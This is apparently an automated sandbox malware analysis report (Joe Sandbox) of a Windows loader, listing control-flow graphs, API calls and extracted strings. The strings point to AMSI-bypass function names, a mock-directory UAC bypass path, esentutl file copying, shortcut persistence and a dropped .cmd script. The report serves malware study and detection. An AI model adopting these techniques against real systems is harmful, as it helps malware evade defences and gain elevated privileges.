                                                                                              control_flow_graph 4574 31e8128-31e8517 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c48ec 4689 31e851d-31e86f0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c47ec call 31c49a0 call 31c4d74 call 31c4df0 CreateProcessAsUserW 4574->4689 4690 31e93a1-31e9524 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c48ec 4574->4690 4799 31e876e-31e8879 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 4689->4799 4800 31e86f2-31e8769 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 4689->4800 4779 31e952a-31e9539 call 31c48ec 4690->4779 4780 31e9cf5-31eb2fa call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 * 16 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31d7c10 call 31d8338 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 ExitProcess 4690->4780 4779->4780 4788 31e953f-31e9812 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31df094 call 31c4860 call 31c49a0 call 31c46d4 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c7e5c 4779->4788 5046 31e9aef-31e9cf0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c49f8 call 31d8d70 4788->5046 5047 31e9818-31e9aea call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31de358 call 31c4530 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4de0 * 2 call 31c4764 call 31ddc8c 4788->5047 4900 31e887b-31e887e 4799->4900 4901 31e8880-31e8ba0 call 31c49f8 call 31dde50 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31dd164 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 4799->4901 4800->4799 4900->4901 5216 31e8bb9-31e939c call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 ResumeThread call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 CloseHandle call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d8080 call 31d894c * 6 CloseHandle call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 4901->5216 5217 31e8ba2-31e8bb4 call 31d8730 4901->5217 5046->4780 5047->5046 5216->4690 5217->5216
                                                                                              APIs
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0333B7E0,0333B824,OpenSession,03247380,031EB7B8,UacScan,03247380), ref: 031E86E9
                                                                                              • ResumeThread.KERNEL32(00000000,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,UacScan,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8), ref: 031E8D33
                                                                                              • CloseHandle.KERNEL32(00000000,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,UacScan,03247380,031EB7B8,00000000,ScanBuffer,03247380,031EB7B8,OpenSession,03247380), ref: 031E8EB2
                                                                                                • Part of subcall function 031D894C: LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
                                                                                                • Part of subcall function 031D894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
                                                                                                • Part of subcall function 031D894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,03247380,031EB7B8,UacInitialize,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,UacScan,03247380), ref: 031E92A4
                                                                                                • Part of subcall function 031C7E5C: GetFileAttributesA.KERNEL32(00000000,?,031E041F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanString,03247380,031EB7B8,UacScan,03247380,031EB7B8,UacInitialize), ref: 031C7E67
                                                                                                • Part of subcall function 031DDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,031DDD5E), ref: 031DDCCB
                                                                                                • Part of subcall function 031DDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 031DDD05
                                                                                                • Part of subcall function 031DDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 031DDD32
                                                                                                • Part of subcall function 031DDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 031DDD3B
                                                                                                • Part of subcall function 031D8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031D83C2), ref: 031D83A4
                                                                                              • ExitProcess.KERNEL32(00000000,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,Initialize,03247380,031EB7B8,00000000,00000000,00000000,ScanString,03247380,031EB7B8), ref: 031EB2FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                              • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                              • API String ID: 2769005614-3738268246
                                                                                              • Opcode ID: df1dcc0d4e472fa12915e057e6475529579958e048ad8ec7fe9602a8ebf9a43f
                                                                                              • Instruction ID: f22566b21af5e86cc2b60090cb297645bfe2a1ce4fb359d7293543d7b9e34b9b
                                                                                              • Opcode Fuzzy Hash: df1dcc0d4e472fa12915e057e6475529579958e048ad8ec7fe9602a8ebf9a43f
                                                                                              • Instruction Fuzzy Hash: A643FD3DA1C66C8FCB12EB65DC909CE73B5EB9D700F1080A9A149AF654DF31AE918F41
                                                                                              Function 031E3E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                                • Part of subcall function 031DDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,031DDD5E), ref: 031DDCCB
                                                                                                • Part of subcall function 031DDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 031DDD05
                                                                                                • Part of subcall function 031DDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 031DDD32
                                                                                                • Part of subcall function 031DDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 031DDD3B
                                                                                              • Sleep.KERNEL32(000003E8,ScanBuffer,03247380,031EB7B8,UacScan,03247380,031EB7B8,ScanString,03247380,031EB7B8,031EBB30,00000000,00000000,031EBB24,00000000,00000000), ref: 031E40CB
                                                                                                • Part of subcall function 031D88B8: LoadLibraryW.KERNEL32(amsi), ref: 031D88C1
                                                                                                • Part of subcall function 031D88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 031D8920
                                                                                              • Sleep.KERNEL32(000003E8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,UacScan,03247380,031EB7B8,000003E8,ScanBuffer,03247380,031EB7B8,UacScan,03247380), ref: 031E4277
                                                                                                • Part of subcall function 031D894C: LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
                                                                                                • Part of subcall function 031D894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
                                                                                                • Part of subcall function 031D894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
                                                                                              • Sleep.KERNEL32(00004E20,UacScan,03247380,031EB7B8,ScanString,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,UacInitialize,03247380,031EB7B8), ref: 031E50EE
                                                                                                • Part of subcall function 031DDC04: RtlI.N(?,?,00000000,031DDC7E), ref: 031DDC2C
                                                                                                • Part of subcall function 031DDC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC42
                                                                                                • Part of subcall function 031DDC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC61
                                                                                                • Part of subcall function 031C7E5C: GetFileAttributesA.KERNEL32(00000000,?,031E041F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanString,03247380,031EB7B8,UacScan,03247380,031EB7B8,UacInitialize), ref: 031C7E67
                                                                                                • Part of subcall function 031D85BC: WinExec.KERNEL32(?,?), ref: 031D8624
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                              • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                              • API String ID: 2171786310-3926298568
                                                                                              • Opcode ID: ae2af48a1c7b9f838f464717a1a132802b469ddfea4633c46eba7f55e4debd15
                                                                                              • Instruction ID: 5de1361bc899e3dcfabe20d7634d7112571a97cadeeb6304f26ac939ff2c7ffe
                                                                                              • Opcode Fuzzy Hash: ae2af48a1c7b9f838f464717a1a132802b469ddfea4633c46eba7f55e4debd15
                                                                                              • Instruction Fuzzy Hash: FE43003CA1C2AD8FCB12EB65DC90ADE73B5AF9D600F1080A59149AF654DF31AE81DF41
                                                                                              Function 031DE678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 10970 31de678-31de67c 10971 31de681-31de686 10970->10971 10971->10971 10972 31de688-31dec81 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4740 * 2 call 31c4860 call 31c4778 call 31c30d4 call 31c46d4 * 2 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4740 call 31c7f2c call 31c49a0 call 31c4d74 call 31c4df0 call 31c4740 call 31c49a0 call 31c4d74 call 31c4df0 call 31d8788 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c 10971->10972 11175 31dec87-31deedd call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 WaitForSingleObject CloseHandle * 2 call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c * 3 10972->11175 11176 31deee2-31def2f call 31c4500 call 31c4c60 call 31c4500 call 31c4c60 call 31c4500 10972->11176 11175->11176
                                                                                              APIs
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                                • Part of subcall function 031D8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031D8814
                                                                                                • Part of subcall function 031D894C: LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
                                                                                                • Part of subcall function 031D894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
                                                                                                • Part of subcall function 031D894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,03247380,031DEF4C,OpenSession,03247380,031DEF4C,UacScan,03247380,031DEF4C,ScanBuffer,03247380,031DEF4C,OpenSession,03247380), ref: 031DED6E
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,03247380,031DEF4C,OpenSession,03247380,031DEF4C,UacScan,03247380,031DEF4C,ScanBuffer,03247380,031DEF4C,OpenSession), ref: 031DED76
                                                                                              • CloseHandle.KERNEL32(00000878,00000000,00000000,000000FF,ScanString,03247380,031DEF4C,OpenSession,03247380,031DEF4C,UacScan,03247380,031DEF4C,ScanBuffer,03247380,031DEF4C), ref: 031DED7F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                              • String ID: )"C:\Users\Public\Libraries\xrbjyllC.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                              • API String ID: 3475578485-909933974
                                                                                              • Opcode ID: 26008050359e1b7a26920326abb5579ba783a37baa73fa8863655a2962eac804
                                                                                              • Instruction ID: d311ef7dcebe5efa90546b92710894cfcb748bddd17657f16750fb4561410c1a
                                                                                              • Opcode Fuzzy Hash: 26008050359e1b7a26920326abb5579ba783a37baa73fa8863655a2962eac804
                                                                                              • Instruction Fuzzy Hash: D0221238A183AD9FDB11FB65D891BCEB3B5AF9D201F1040A9A044EF254DF30AE41CB56
                                                                                              Function 031C1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
